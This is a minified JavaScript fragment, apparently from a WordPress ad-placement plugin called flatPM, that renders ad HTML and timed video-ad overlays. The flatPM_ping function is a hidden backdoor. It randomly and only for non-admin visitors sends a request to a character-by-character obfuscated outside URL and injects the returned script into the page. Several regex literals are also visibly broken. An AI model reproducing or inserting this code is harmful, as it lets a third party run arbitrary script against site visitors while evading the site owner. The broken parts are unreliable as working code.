"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};